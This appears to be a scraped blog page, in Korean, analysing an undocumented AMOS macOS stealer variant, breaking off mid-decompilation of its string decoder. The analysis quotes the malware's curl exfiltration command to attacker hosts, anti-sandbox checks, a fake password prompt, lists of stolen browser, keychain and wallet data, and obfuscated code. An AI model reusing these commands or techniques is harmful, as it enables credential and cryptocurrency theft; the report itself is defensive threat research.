main.exe",{"href":12984,"text":12985},"#_6-심층-분석-inputjs-암호화된-javascript-페이로드-로더","심층 분석: input.js",{"href":12987,"text":12988},"#_7-심층-분석-akira-stealer-v2-astorpy","심층 분석: Akira Stealer v2",{"href":12990,"text":12991},"#_8-순환-실행-체인-자가-치유-루프","순환 실행 체인",{"href":12993,"text":12994},"#_9-블록체인-추적-및-분석","블록체인 추적 및 분석",{"href":12996,"text":12997},"#_10-akira-생태계-들여다보기-상업화된-사이버범죄-인프라","Akira 생태계 들여다보기",{"href":12999,"text":13000},"#_11-akira-stealer-quickcheck-영향받은-파일","Akira Stealer QuickCheck 영향받은 파일",{"href":13002,"text":13003},"#_12-대응을-넘어-glueckkanja-csoc가-인시던트를-인사이트로-바꾸는-방법","glueckkanja CSOC가 인시던트를 인사이트로 바꾸는 방법",{"href":13005,"text":13006},"#_13-침해-지표-iocs","침해 지표 (IOCs)",{"href":13008,"text":13009},"#_14-akira-stealer-인시던트-되돌아보기-glueckkanja-csoc로-방어-강화하기","Akira Stealer 인시던트 되돌아보기",{"href":13011,"text":13012},"#_15-보안-및-법적-고지-실제-멀웨어-코드-사용","보안 및 법적 고지",{"noMargin":325},{"quote":484,"infos":13015},{"bgColor":13016,"color":13017,"boxBgColor":13018,"boxColor":13019,"headline":13020,"subline":13021,"level":740,"textStyling":13022,"flush":13023,"person":13024,"form":13036},"var(--color-gk-violet)","var(--color-gk-white)","var(--color-gk-yellow)","var(--color-copy)","지금 문의하세요","선도적인 Microsoft 보안 MSSP로서 우리는 매일 기업을 사이버 위협으로부터 보호합니다. 함께 이야기 나누고 여러분의 사이버 방어를 강화해 보세요!","text-light","justify-content-end",{"image":13025,"cloudinary":325,"alt":13026,"name":13026,"detailsHeader":13027,"details":13028},"/people/people-pam-team.png","프로젝트 및 계정 관리","여러분의 연락을 기다립니다!",[13029,13033],{"text":492,"href":13030,"details":13031,"icon":13032},"tel:+49 69 4005520","지금 전화하기","site/phone",{"text":493,"href":13034,"icon":13035},"mailto:info@glueckkanja.com","site/mail",{"ctaText":13037,"cta":13038,"method":12952,"action":13040,"fields":13041},"보내기",{"skin":13039},"primary on-surface","/send",[13042,13046,13050,13053,13057,13062,13065,13068],{"type":13043,"id":13044,"value":13045},"hidden","_next","successful",{"label":13047,"type":620,"id":13048,"required":325,"requiredMsg":13049},"이름*","name","이름을 입력해 주세요.",{"label":13051,"type":620,"id":403,"required":325,"requiredMsg":13052},"회사*","회사명을 입력해 주세요.",{"label":13054,"type":13055,"id":13055,"required":325,"requiredMsg":13056},"이메일 주소*","email","이메일 주소를 입력해 주세요.",{"label":13058,"type":13059,"id":13060,"required":325,"requiredMsg":13061},"귀하의 데이터는 문의 처리 및 응답 목적으로 당사에 저장됩니다. 데이터 보호에 관한 자세한 내용은 \u003Ca href=\"/ko/privacy\">개인정보 처리방침\u003C/a>을 참고해 주세요.","checkbox","dataprotection","확인해 주세요",{"type":13043,"id":13063,"value":13064},"_subject","Form: Blog MSSP 2025 | EN",{"type":13043,"id":13066,"value":13067},"inbox_key","gkgab-contact-form",{"type":13043,"id":13069},"_gotcha","/posts/2025-06-16-quiet-breach",{"title":552,"description":562},"posts/2025-06-16-quiet-breach",[13074,13075,13076,13077],"Microsoft 365 Defender","Threat Intelligence","Cyber Security Operations Center","Incident Deep Dive","VqN6eu3CR93UTw1hRHtIYzBMWmdAYHVTudp6IZ2PgIY",{"id":13080,"title":13081,"author":13082,"body":13083,"cta":494,"description":13087,"eventid":494,"extension":533,"hideInRecent":484,"layout":12952,"meta":15168,"moment":15170,"navigation":325,"path":15228,"seo":15229,"stem":15230,"tags":15231,"webcast":484,"__hash__":15235},"content_ko/posts/2026-04-10-incident-to-intelligence.md","알려지지 않은 AMOS 스틸러의 해부: 알림에서 몇 시간 만에 면역까지",[521],{"type":523,"value":13084,"toc":15132},[13085,13088,13091,13094,13097,13101,13103,13106,13113,13115,13119,13121,13124,13133,13136,13139,13147,13150,13154,13156,13159,13178,13181,13189,13192,13200,13207,13211,13213,13216,13224,13239,13243,13245,13248,13252,13254,13262,13266,13268,13276,13280,13282,13285,13289,13291,13294,13302,13306,13308,13315,13318,13407,13410,13440,13442,13446,13448,13454,13457,13461,13463,13535,13539,13541,13552,13558,13629,13640,13647,13651,13653,13712,13716,13718,13725,13727,13731,13733,13740,13766,13951,13954,13962,13972,13975,13983,13997,14010,14012,14016,14018,14037,14059,14248,14251,14259,14262,14265,14267,14271,14273,14276,14348,14351,14370,14448,14451,14453,14457,14459,14462,14469,14524,14527,14535,14538,14540,14544,14546,14553,14564,14612,14623,14662,14671,14686,14689,14691,14695,14697,14704,14707,14715,14718,14726,14740,14743,14745,14749,14751,14761,14765,14767,14785,14793,14807,14827,14831,14833,14836,14844,14847,14855,14869,14873,14875,14878,14886,14905,14911,14915,14917,14925,14931,14937,14941,14943,14951,14955,14957,14960,14968,14971,14975,14977,14985,14989,14991,14999,15003,15005,15013,15017,15019,15027,15044,15049,15051,15054,15056,15063,15080,15083,15096,15098,15102,15104,15107,15110,15113,15129],[526,13086,13087],{},"우리 SOC에서 알림이 발생하면 시계가 돌아가기 시작합니다. 해당 고객뿐 아니라 우리 보호 아래에 있는 모든 조직에 대해서 말입니다. 현대 위협 환경에서 가장 위험한 순간은 인텔리전스 갭(Intelligence Gap), 즉 새로운 멀웨어 변종이 처음 사용된 시점과 업계가 그것을 알게 되는 날 사이의 시간 창입니다.",[526,13089,13090],{},"독립적으로 운영되는 보안 팀에게 이 간극은 극도의 취약성을 의미합니다. 아직 작성되지도 않은 벤더 업데이트나 시그니처 피드를 기다려야 하기 때문입니다. 우리 고객에게는 우리가 자체 개발한 Shared Threat Intelligence가 바로 이 창을 닫아 줍니다.",[526,13092,13093],{},"이 글은 지금까지 문서화되지 않은 AMOS 변종(Atomic macOS Stealer)을 우리가 어떻게 해체했는지, 그리고 단 하나의 침해된 엔드포인트가 어떻게 몇 시간 만에 우리의 모든 고객 환경을 아우르는 탐지와 차단으로 이어졌는지에 대한 기술적 분석입니다.",[13095,13096],"hr",{},[557,13098,13100],{"id":13099},"사건-알려지지-않은-ioc-시나리오","사건: 알려지지 않은 IOC 시나리오",[526,13102,562],{},[526,13104,13105],{},"알림은 2026년 3월 12일 현지 시각 06시 25분에 도착했습니다. macOS 엔드포인트 하나가 침해된 것입니다. 우리 SOC가 아티팩트 분석에 착수했을 때, 우리는 모든 위협 분석가가 두려워하는 상황에 직면했습니다. 알려진 파일 해시도, C2 IP 주소도, 공개 데이터베이스에서 의미 있는 행위 시그니처도 없었습니다.",[526,13107,13108,13109,13112],{},"전체 공격 아키텍처는 심층 분석에 이르러서야 드러났습니다. 이 감염은 ",[578,13110,13111],{},"/private/tmp/helper","에 저장된 15.7MB 크기의 macOS 유니버설 바이너리(x86_64 및 ARM64)에 기반하고 있었습니다. 샘플은 침해된 시스템에서 직접 확보할 수 없었기에, 우리 팀은 감염 체인을 재구성하고 최초의 전송 요청을 시뮬레이션하여 공격자 인프라에서 바이너리를 수동으로 가져와야 했습니다.",[13095,13114],{},[740,13116,13118],{"id":13117},"_1단계-샌드박스-점검","1단계: 샌드박스 점검",[526,13120,746],{},[526,13122,13123],{},"실제 스틸러가 기기에서 실행되기 전에, 이미 AppleScript 페이로드가 한 차례 실행된 상태였습니다. 그 안의 모든 문자열, 모든 파일 경로, 모든 셸 명령, 모든 URL이 세 개의 사용자 정의 산술 함수를 통해 인코딩되어 있었습니다:",[853,13125,13127],{"style":13126},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[615,13128,13131],{"className":13129,"code":13130,"language":620},[618],"on ipbgcjzgqa(a, b)\n    -- result[i] = chr(a[i] - b[i])\n\non kwcvvjininv(a, b)\n    -- result[i] = chr(a[i] + b[i])\n\non xqylheckjx(a, b, offset)\n    -- result[i] = chr(a[i] - b[i] - offset)\n",[578,13132,13130],{"__ignoreMap":530},[526,13134,13135],{},"단 하나의 문자열도 평문으로 나타나지 않습니다. 언뜻 의미 없는 정수 배열처럼 보였던 것이, 인코딩 방식을 역으로 풀어내자 완전하고 즉시 사용 가능한 데이터 탈취 및 유출 프레임워크로 드러났습니다.",[526,13137,13138],{},"우리는 스크립트의 모든 배열을 정적으로 디코딩했습니다. 결과는 명확했습니다:",[853,13140,13141],{"style":13126},[615,13142,13145],{"className":13143,"code":13144,"language":620},[618],"Download URL: https[:]//woupp[.]com/n8n/update\nExfil server: http[:]//92[.]246[.]136[.]14/contact\nExfil method: curl --connect-timeout 120 --max-time 300 -X POST -F \"file=@/tmp/out.zip\"\n",[578,13146,13144],{"__ignoreMap":530},[526,13148,13149],{},"다운로드 URL은 개발자와 DevOps 엔지니어 사이에서 널리 쓰이는 도구인 정상적인 n8n 워크플로 자동화 업데이트를 의도적으로 모방합니다. 이는 우연이 아닙니다. 이 캠페인은 크랙된 소프트웨어를 설치하는 일반 최종 사용자가 아니라, 기술적으로 숙련된 사용자를 겨냥합니다.",[740,13151,13153],{"id":13152},"안티-샌드박스-검사","안티 샌드박스 검사",[526,13155,746],{},[526,13157,13158],{},"다운로드에 앞서 스크립트는 전용 VM 및 샌드박스 탐지 루틴을 실행했습니다. 인시던트 아티팩트로부터 우리는 별도의 독립적인 안티 샌드박스 스크립트도 복원할 수 있었습니다:",[853,13160,13161],{"style":13126},[615,13162,13166],{"className":13163,"code":13164,"language":13165,"meta":530,"style":530},"language-applescript shiki shiki-themes github-light github-dark","set urgufr  to do shell script \"system_profiler SPMemoryDataType\"\nset qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n","applescript",[578,13167,13168,13173],{"__ignoreMap":530},[1706,13169,13170],{"class":1708,"line":1709},[1706,13171,13172],{},"set urgufr  to do shell script \"system_profiler SPMemoryDataType\"\n",[1706,13174,13175],{"class":1708,"line":531},[1706,13176,13177],{},"set qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n",[526,13179,13180],{},"그런 다음 스크립트는 그 결과를 두 개의 목록과 대조했습니다. 첫 번째 목록은 메모리 데이터에서 가상화 표식을 찾았습니다:",[853,13182,13183],{"style":13126},[615,13184,13187],{"className":13185,"code":13186,"language":620},[618],"\"QEMU\"   \"VMware\"   \"KVM\"\n",[578,13188,13186],{"__ignoreMap":530},[526,13190,13191],{},"두 번째 목록은 하드웨어 식별자를 알려진 분석 장비의 일련번호 목록과 대조했습니다:",[853,13193,13194],{"style":13126},[615,13195,13198],{"className":13196,"code":13197,"language":620},[618],"\"Z31FHXYQ0J\"     -- known sandbox machine serial\n\"C07T508TG1J2\"   -- known sandbox machine serial\n\"C02TM2ZBHX87\"   -- known sandbox machine serial\n\"Chip: Unknown\"  -- emulation indicator\n\"Intel Core 2\"   -- legacy/VM indicator\n",[578,13199,13197],{"__ignoreMap":530},[526,13201,13202,13203,13206],{},"일치하는 항목이 있으면 ",[578,13204,13205],{},"exit 100","으로 완전히 중단합니다. Apple Silicon을 탑재한 실제 MacBook Pro에서는 모든 검사가 조용히 통과되었고, 실행이 계속되었습니다. 바이너리의 단 1바이트가 다운로드되기도 전에 작동하는, 전문가 수준의 샌드박스 회피 기법입니다.",[740,13208,13210],{"id":13209},"단순하지만-효과적인-방식-위조된-비밀번호-입력창","단순하지만 효과적인 방식: 위조된 비밀번호 입력창",[526,13212,746],{},[526,13214,13215],{},"디코딩된 스크립트에는 소셜 엔지니어링을 통한 권한 상승용 대화상자도 들어 있었습니다:",[853,13217,13218],{"style":13126},[615,13219,13222],{"className":13220,"code":13221,"language":620},[618],"Title:   \"Application wants to install helper\"\nPrompt:  \"Required Application Helper. Please enter device\n          password to continue.\"\nButton:  \"Continue\"\n",[578,13223,13221],{"__ignoreMap":530},[526,13225,13226,13227,13230,13231,13234,13235,13238],{},"이 대화상자는 ",[578,13228,13229],{},"with hidden answer"," 옵션이 붙은 표준 macOS ",[578,13232,13233],{},"display dialog"," 호출을 통해 표시되며, 겉보기에 실제 macOS 인증 요청과 구별할 수 없습니다. 스크립트는 입력된 비밀번호를 사용해 ",[578,13236,13237],{},"login -pf \u003Cusername>","를 호출했고, 바이너리가 실행되기도 전에 프로세스를 루트 권한으로 상승시켰습니다.",[740,13240,13242],{"id":13241},"스크립트가-수집한-것","스크립트가 수집한 것",[526,13244,746],{},[526,13246,13247],{},"바이너리가 실행되자마자 osascript는 자체 수집 절차를 이어가며 모든 범주의 민감한 시스템 데이터를 빼내기 시작했습니다. 우리는 모든 수집 경로와 대상을 디코딩했습니다:",[888,13249,13251],{"id":13250},"브라우저-데이터모든-chromium-브라우저-safari","브라우저 데이터(모든 Chromium 브라우저 + Safari):",[526,13253,894],{},[853,13255,13256],{"style":13126},[615,13257,13260],{"className":13258,"code":13259,"language":620},[618],"/Login Data          /Cookies            /Web Data\n/Local Extension Settings/   /IndexedDB/   /Local Storage/leveldb/\n",[578,13261,13259],{"__ignoreMap":530},[888,13263,13265],{"id":13264},"macos-keychain","macOS Keychain:",[526,13267,894],{},[853,13269,13270],{"style":13126},[615,13271,13274],{"className":13272,"code":13273,"language":620},[618],"~/Library/Keychains/login.keychain-db  -- accessed directly via cat\n",[578,13275,13273],{"__ignoreMap":530},[888,13277,13279],{"id":13278},"apple-notes","Apple Notes",[526,13281,894],{},[526,13283,13284],{},"카운터 헤더와 함께 전체 내용을 HTML로 내보냄",[888,13286,13288],{"id":13287},"로컬-파일","로컬 파일",[526,13290,894],{},[526,13292,13293],{},"데스크톱과 문서 폴더, 최대 30MB, 다음 확장자에 집중:",[853,13295,13296],{"style":13126},[615,13297,13300],{"className":13298,"code":13299,"language":620},[618],"pdf  doc  docx  xls  xlsx  ppt  pptx  txt  rtf\nkey  p12  pem  cert  pfx  sql  db  sqlite\njson  xml  yaml  conf  env  csv\n",[578,13301,13299],{"__ignoreMap":530},[888,13303,13305],{"id":13304},"암호화폐-지갑","암호화폐 지갑",[526,13307,894],{},[526,13309,13310,13311,13314],{},"MetaMask, Coinbase Wallet, TronLink, Phantom, Keplr, Yoroi, Ledger Live, Trezor Suite, XDEFI, Exodus를 포함해 모든 주요 지갑을 아우르는 ",[567,13312,13313],{},"200개가 넘는 브라우저 확장 프로그램 ID","의 하드코딩된 목록입니다.",[526,13316,13317],{},"수집이 끝나면 모든 데이터가 무작위로 이름 붙여진 임시 디렉터리에 묶여 유출되었습니다:",[853,13319,13320],{"style":13126},[615,13321,13323],{"className":2782,"code":13322,"language":2784,"meta":530,"style":530},"ditto -c -k --sequesterRsrc \u003Cstaging_dir> /tmp/out.zip\ncurl --connect-timeout 120 --max-time 300 -X POST \\\n  -H \"user: \u003Cuuid>\" -H \"BuildID: \u003Chw_profile>\" \\\n  -F \"file=@/tmp/out.zip\" laislivon[.]com/contact\n",[578,13324,13325,13354,13380,13396],{"__ignoreMap":530},[1706,13326,13327,13330,13333,13336,13339,13342,13345,13348,13351],{"class":1708,"line":1709},[1706,13328,13329],{"class":2791},"ditto",[1706,13331,13332],{"class":2799}," -c",[1706,13334,13335],{"class":2799}," -k",[1706,13337,13338],{"class":2799}," --sequesterRsrc",[1706,13340,13341],{"class":3017}," \u003C",[1706,13343,13344],{"class":2795},"staging_di",[1706,13346,13347],{"class":3027},"r",[1706,13349,13350],{"class":3017},">",[1706,13352,13353],{"class":2795}," /tmp/out.zip\n",[1706,13355,13356,13359,13362,13365,13368,13371,13374,13377],{"class":1708,"line":531},[1706,13357,13358],{"class":2791},"curl",[1706,13360,13361],{"class":2799}," --connect-timeout",[1706,13363,13364],{"class":2799}," 120",[1706,13366,13367],{"class":2799}," --max-time",[1706,13369,13370],{"class":2799}," 300",[1706,13372,13373],{"class":2799}," -X",[1706,13375,13376],{"class":2795}," POST",[1706,13378,13379],{"class":2799}," \\\n",[1706,13381,13382,13385,13388,13391,13394],{"class":1708,"line":2091},[1706,13383,13384],{"class":2799},"  -H",[1706,13386,13387],{"class":2795}," \"user: \u003Cuuid>\"",[1706,13389,13390],{"class":2799}," -H",[1706,13392,13393],{"class":2795}," \"BuildID: \u003Chw_profile>\"",[1706,13395,13379],{"class":2799},[1706,13397,13398,13401,13404],{"class":1708,"line":2097},[1706,13399,13400],{"class":2799},"  -F",[1706,13402,13403],{"class":2795}," \"file=@/tmp/out.zip\"",[1706,13405,13406],{"class":2795}," laislivon[.]com/contact\n",[526,13408,13409],{},"정리 작업이 곧바로 뒤따랐습니다:",[853,13411,13412],{"style":13126},[615,13413,13415],{"className":2782,"code":13414,"language":2784,"meta":530,"style":530},"rm -r \u003Cstaging_dir>\nrm /tmp/out.zip\n",[578,13416,13417,13434],{"__ignoreMap":530},[1706,13418,13419,13422,13425,13427,13429,13431],{"class":1708,"line":1709},[1706,13420,13421],{"class":2791},"rm",[1706,13423,13424],{"class":2799}," -r",[1706,13426,13341],{"class":3017},[1706,13428,13344],{"class":2795},[1706,13430,13347],{"class":3027},[1706,13432,13433],{"class":3017},">\n",[1706,13435,13436,13438],{"class":1708,"line":531},[1706,13437,13421],{"class":2791},[1706,13439,13353],{"class":2795},[13095,13441],{},[557,13443,13445],{"id":13444},"_2단계-helper-바이너리-리버스-엔지니어링","2단계: 'helper' 바이너리 리버스 엔지니어링",[526,13447,562],{},[526,13449,13450,13453],{},[578,13451,13452],{},"helper"," 바이너리는 이 분석이 정말로 깊이 파고드는 부분입니다. 이것은 정적 분석을 체계적으로 방해하도록 전문적으로 난독화된 macOS 실행 파일로, 이번 조사에서 가장 큰 리버스 엔지니어링 노력을 요구했습니다.",[526,13455,13456],{},"전체 분석은 Ghidra와 우리의 사용자 정의 ARM64 분석 워크플로로 수행했습니다.",[740,13458,13460],{"id":13459},"파일-속성","파일 속성",[526,13462,746],{},[853,13464,13466],{"style":13465},"border-radius: 6px; overflow: hidden; margin: 0.25rem 0",[1418,13467,4706,13469,4706,13478],{"style":13468},"width:100%; border-collapse: collapse; font-size: 0.85rem",[1421,13470,4711,13471,4706],{},[1424,13472,11167,13473,11167,13476,4711],{},[1427,13474,1429],{"style":13475},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600",[1427,13477,1432],{"style":13475},[1434,13479,4711,13480,4711,13489,4711,13497,4711,13505,4711,13515,4711,13525,4706],{},[1424,13481,11167,13482,11167,13486,4711],{},[1439,13483,13485],{"style":13484},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","포맷",[1439,13487,13488],{"style":13484},"Mach-O Universal Binary",[1424,13490,11167,13491,11167,13494,4711],{},[1439,13492,1089],{"style":13493},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff",[1439,13495,13496],{"style":13493},"x86_64 (offset 0x1000) + ARM64 (offset 0x7ec000)",[1424,13498,11167,13499,11167,13502,4711],{},[1439,13500,13501],{"style":13484},"크기",[1439,13503,13504],{"style":13484},"15.7 MB",[1424,13506,11167,13507,11167,13510,4711],{},[1439,13508,13509],{"style":13493},"MD5",[1439,13511,13512],{"style":13493},[578,13513,13514],{},"4599fdf2fa2099b30d8bbf76703dd634",[1424,13516,11167,13517,11167,13520,4711],{},[1439,13518,13519],{"style":13484},"SHA-1",[1439,13521,13522],{"style":13484},[578,13523,13524],{},"3992edfb6f885ae5f09f3e69a2578048d6d5bb54",[1424,13526,11167,13527,11167,13530,4711],{},[1439,13528,13529],{"style":13493},"SHA-256",[1439,13531,13532],{"style":13493},[578,13533,13534],{},"5664800f21d63e448b934bfcdc258b0c7dadb36e88cf4dd71b24e19656a2b78d",[740,13536,13538],{"id":13537},"실행은-main-이전에-시작된다","실행은 main() 이전에 시작된다",[526,13540,746],{},[526,13542,13543,13544,13547,13548,13551],{},"우리가 Ghidra에서 가장 먼저 확인한 사실은, 이 바이너리가 일반적인 실행 파일처럼 동작하지 않는다는 점이었습니다. 실제 진입점은 ",[578,13545,13546],{},"main()","이 아니라 ",[578,13549,13550],{},"__mod_init_func","에 등록된 함수입니다. 이는 동적 링커(dyld)에게 바이너리 로드 시 특정 함수를 자동으로, 그것도 실질적인 코드가 실행되기 전에 실행하도록 지시하는 macOS 메커니즘입니다.",[526,13553,13554,13557],{},[578,13555,13556],{},"0x10009f384","에 있는 init 함수가 이 멀웨어의 실제 진입점입니다. 다음은 Ghidra 디컴파일 결과입니다:",[853,13559,13560],{"style":13126},[13561,13562,13563,13567,13569,13572,3282,13576,3219,13580,13582,13583,13586,13587,13601],"code-block",{},[1706,13564,13566],{"style":13565},"color:#6a737d","// FUN_10009f384 @ 0x10009f384",[723,13568],{},[1706,13570,13571],{"style":13565},"// __mod_init_func registered — executes before main()",[1706,13573,13575],{"style":13574},"color:#d73a49","void",[1706,13577,13579],{"style":13578},"color:#6f42c1","FUN_10009f384",[1706,13581,13575],{"style":13574},")\n{\n  ",[1706,13584,13585],{"style":13574},"int"," iVar1;\n",[526,13588,13589,13592,13593,3219,13596,13600],{},[1706,13590,13591],{"style":13565},"// Anti-sandbox delay: usleep(0x37e) = 894 microseconds","\niVar1 = ",[1706,13594,13595],{"style":13578},"_usleep",[1706,13597,13599],{"style":13598},"color:#005cc5","0x37e",");",[526,13602,13603,13606,13609,13610,13612,13613,13616,13617,13620,13621,13624,13625,13628],{},[1706,13604,13605],{"style":13565},"// Indirect jump table — 14-state machine",[1706,13607,13608],{"style":13565},"// Defeats CFG reconstruction in static analysis tools","\n(_(",[1706,13611,578],{"style":13574}," _)((",[1706,13614,13615],{"style":13574},"ulong",")switchD_10009f43c::switchdataD_1000cd3fc * ",[1706,13618,13619],{"style":13598},"4"," + ",[1706,13622,13623],{"style":13598},"0x10009f440","))(iVar1);\n",[1706,13626,13627],{"style":13574},"return",";\n}",[526,13630,13631,13632,13635,13636,13639],{},"두 가지가 즉시 눈에 띕니다. 첫째, 시작 시점의 894마이크로초 ",[578,13633,13634],{},"usleep",", 즉 안티 샌드박스 타이밍 신호입니다. 더 심각한 것은 ",[578,13637,13638],{},"0x10009f43c","에 있는 간접 점프 테이블입니다. 이것은 목표 주소가 실행 시점에 룩업 테이블에서 결정되는 계산된 분기(branch)입니다. 정적 분석 도구는 제어 흐름 그래프를 재구성할 수 없으며, Ghidra는 실행 경로를 추적하려는 과정에서 여러 개의 “unreachable block” 경고를 기록했습니다. 이는 의도된 것입니다.",[526,13641,13642,13643,13646],{},"이 점프 테이블은 ",[567,13644,13645],{},"14개 상태로 이루어진 실행 머신","을 구동합니다. 각 상태는 복호화 및 실행 파이프라인의 개별적이고 독립된 단계 하나를 수행합니다. 상태 카운터는 각 단계 이후 갱신되며, 머신은 모든 상태를 거칠 때까지 실행됩니다.",[740,13648,13650],{"id":13649},"상태-디스패처의-arm64-디스어셈블리","상태 디스패처의 ARM64 디스어셈블리",[526,13652,746],{},[853,13654,13655],{"style":13126},[615,13656,13660],{"className":13657,"code":13658,"language":13659,"meta":530,"style":530},"language-asm shiki shiki-themes github-light github-dark","10009f3fc:  stp xzr,xzr,[sp, #0x48]\n10009f41c:  mov w0,#0x37e\n10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox\n10009f424:  cmp w25,#0xd             ; state counter \u003C 14?\n10009f428:  b.hi 0x10009fd44         ; exit if done\n10009f42c:  mov w8,w25               ; current state index\n10009f430:  adr x9,0x10009f440       ; base of jump table\n10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address\n10009f43c:  br x9                    ; indirect branch, CFG broken here\n","asm",[578,13661,13662,13667,13672,13677,13682,13687,13692,13697,13702,13707],{"__ignoreMap":530},[1706,13663,13664],{"class":1708,"line":1709},[1706,13665,13666],{},"10009f3fc:  stp xzr,xzr,[sp, #0x48]\n",[1706,13668,13669],{"class":1708,"line":531},[1706,13670,13671],{},"10009f41c:  mov w0,#0x37e\n",[1706,13673,13674],{"class":1708,"line":2091},[1706,13675,13676],{},"10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox\n",[1706,13678,13679],{"class":1708,"line":2097},[1706,13680,13681],{},"10009f424:  cmp w25,#0xd             ; state counter \u003C 14?\n",[1706,13683,13684],{"class":1708,"line":2419},[1706,13685,13686],{},"10009f428:  b.hi 0x10009fd44         ; exit if done\n",[1706,13688,13689],{"class":1708,"line":2425},[1706,13690,13691],{},"10009f42c:  mov w8,w25               ; current state index\n",[1706,13693,13694],{"class":1708,"line":3081},[1706,13695,13696],{},"10009f430:  adr x9,0x10009f440       ; base of jump table\n",[1706,13698,13699],{"class":1708,"line":3874},[1706,13700,13701],{},"10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n",[1706,13703,13704],{"class":1708,"line":3880},[1706,13705,13706],{},"10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address\n",[1706,13708,13709],{"class":1708,"line":4129},[1706,13710,13711],{},"10009f43c:  br x9                    ; indirect branch, CFG broken here\n",[740,13713,13715],{"id":13714},"여섯-겹으로-쌓인-난독화-계층","여섯 겹으로 쌓인 난독화 계층",[526,13717,746],{},[526,13719,13720,13721,13724],{},"이 바이너리는 서로 다른 여섯 개의 난독화 계층을 사용하며, 이들은 각 계층의 출력이 다음 계층으로 입력되도록 쌓이고 연결되어 있습니다. 모든 페이로드, 모든 문자열, 모든 내부 상수가 인코딩되어 있습니다. ",[578,13722,13723],{},"__const"," 세그먼트에는 의미 있는 어떤 것도 평문으로 나타나지 않습니다. 이어지는 내용은 개별 ARM64 명령어 수준까지 Ghidra에서 직접 검증한 완전한 계층별 분석입니다. 사용된 각 기법은 개별적으로는 잘 알려진 것이지만, 여러 단계에 걸쳐 연결해 적용함으로써 정적·동적 분석을 상당히 어렵게 만드는, 서로 강하게 의존하는 실행 흐름이 만들어졌습니다.",[13095,13726],{},[888,13728,13730],{"id":13729},"계층-1-컴파일-타임-트리플렛-인코딩","계층 1: 컴파일 타임 트리플렛 인코딩",[526,13732,894],{},[526,13734,13735,13736,13739],{},"바이너리 내의 어떤 문자열도 문자 시퀀스로 저장되어 있지 않고, 12바이트 산술 트리플렛의 시퀀스로 저장되어 있습니다. 각 트리플렛 ",[578,13737,13738],{},"(a, b, shift)","은 정확히 하나의 출력 문자를 인코딩합니다. 인코딩 방식은 컴파일 타임에 적용되므로, 어떤 문자열도 로드 시점에 일시적으로조차 바이너리 안에 평문으로 존재하지 않습니다.",[526,13741,13742,13743,13746,13747,13750,13751,13754,13755,13746,13758,13761,13762,13765],{},"두 개의 별도 디코더 함수가 서로 다른 문자열 크기를 처리합니다. ",[578,13744,13745],{},"0x100087c08","에 있는 ",[578,13748,13749],{},"FUN_100087c08","은 60자 문자열(",[578,13752,13753],{},"DAT_1006292cc","에서 가져온 720바이트 입력 데이터)을 디코딩합니다. ",[578,13756,13757],{},"0x10007ad80",[578,13759,13760],{},"FUN_10007ad80","은 56자 문자열(",[578,13763,13764],{},"DAT_10049708c","에서 가져온 672바이트)을 디코딩합니다. 둘 다 동일한 알고리즘을 사용합니다.",[853,13767,13768],{"style":13126},[13561,13769,13770,13773,13775,13778,3282,13780,3219,13782,13785,13786,13788,13789,13791,13792,13794,13795,13798,13799],{},[1706,13771,13772],{"style":13565},"// FUN_100087c08 @ 0x100087c08",[723,13774],{},[1706,13776,13777],{"style":13565},"// Triplet decoder, 60 chars, data from DAT_1006292cc",[1706,13779,13575],{"style":13574},[1706,13781,13749],{"style":13578},[1706,13783,13784],{"style":13574},"long"," *param_1)\n{\n  ",[1706,13787,13784],{"style":13574}," *plVar1;\n  ",[1706,13790,13575],{"style":13574}," *pvVar2;\n  ",[1706,13793,13784],{"style":13574}," lVar3;\n  ",[1706,13796,13797],{"style":13574},"uint"," *puVar4;\n",[526,13800,13801,13802,3219,13805,13808,13809,13814,13817,13818,13808,13820,13823,13825,13828,13829,646,13832,13808,13835,13838,13839,13841,13842,13612,13844,13846,13847,3084,13850,13853,13854,13856,13857,13860,13861,13864,13865,13612,13868,13870,13871,13874,13875,13878,13880,13883,13884,13612,13886,13888,13889,13891,13892,13894,13895,13900,13901,13904,13905,13910,13911,13914,13915,13917,13918,13923,13924,13926,13927,13929,13930,13933,13934,13937,13938,13808,13940,13943,13945,13948,13949,13628],{},"pvVar2 = ",[1706,13803,13804],{"style":13578},"operator_new",[1706,13806,13807],{"style":13598},"0x2d0","); ",[1706,13810,13811,13812],{"style":13565},"// allocate 720 bytes (60 triplets × 12)",[723,13813],{},[1706,13815,13816],{"style":13578},"_memcpy","(pvVar2, &DAT_1006292cc, ",[1706,13819,13807],{"style":13598},[1706,13821,13822],{"style":13565},"// copy encoded triplets from __const",[723,13824],{},[1706,13826,13827],{"style":13578},"FUN_1000a0840","(param_1, ",[1706,13830,13831],{"style":13598},"0x3c",[1706,13833,13834],{"style":13598},"0",[1706,13836,13837],{"style":13565},"// init 60-char output buffer","\nlVar3 = ",[1706,13840,13834],{"style":13598},";\npuVar4 = (",[1706,13843,13797],{"style":13574},[1706,13845,13784],{"style":13574},")pvVar2 + ",[1706,13848,13849],{"style":13598},"8",[1706,13851,13852],{"style":13574},"do"," {\nplVar1 = (",[1706,13855,13784],{"style":13574}," _)_param_1;\n",[1706,13858,13859],{"style":13574},"if"," (-",[1706,13862,13863],{"style":13598},"1"," \u003C _(",[1706,13866,13867],{"style":13574},"char",[1706,13869,13784],{"style":13574},")param_1 + ",[1706,13872,13873],{"style":13598},"0x17",")) {\nplVar1 = param_1;\n}\n",[1706,13876,13877],{"style":13565},"// THE DECODE FORMULA, one character per triplet:",[723,13879],{},[1706,13881,13882],{"style":13565},"// char = ((b _ 3) XOR a) >> shift) - b","\n_(",[1706,13885,13867],{"style":13574},[1706,13887,13784],{"style":13574},")plVar1 + lVar3) 